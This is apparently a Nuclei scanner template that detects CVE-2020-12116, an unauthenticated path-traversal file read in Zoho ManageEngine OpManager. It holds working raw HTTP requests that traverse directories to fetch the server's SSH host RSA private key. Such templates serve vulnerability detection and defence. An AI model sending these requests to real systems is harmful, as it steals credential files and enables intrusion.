52 lines
1.4 KiB
YAML
52 lines
1.4 KiB
YAML
|
id: CVE-2020-12116
|
||
|
|
||
|
info:
|
||
|
name: Zoho ManageEngine OpManger - Arbitrary File Read
|
||
|
author: dwisiswant0
|
||
|
severity: high
|
||
|
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.
|
||
|
reference:
|
||
|
- https://github.com/BeetleChunks/CVE-2020-12116
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-12116
|
||
|
- https://www.manageengine.com/network-monitoring/help/read-me-complete.html
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||
|
cvss-score: 7.5
|
||
|
cve-id: CVE-2020-12116
|
||
|
cwe-id: CWE-22
|
||
|
tags: cve,cve2020,zoho,lfi,manageengine
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
GET / HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Accept: */*
|
||
|
Connection: close
|
||
|
|
||
|
- |
|
||
|
GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Accept: */*
|
||
|
Cache-Control: max-age=0
|
||
|
Connection: close
|
||
|
Referer: http://{{Hostname}}
|
||
|
|
||
|
extractors:
|
||
|
- type: regex
|
||
|
name: endpoint
|
||
|
part: body
|
||
|
internal: true
|
||
|
regex:
|
||
|
- "(?m)/cachestart/.*/jquery/"
|
||
|
|
||
|
req-condition: true
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'contains(body_2, "BEGIN RSA PRIVATE KEY")'
|
||
|
- 'status_code_2 == 200'
|
||
|
condition: and
|
||
|
|
||
|
# Enhanced by mp on 2022/05/04
|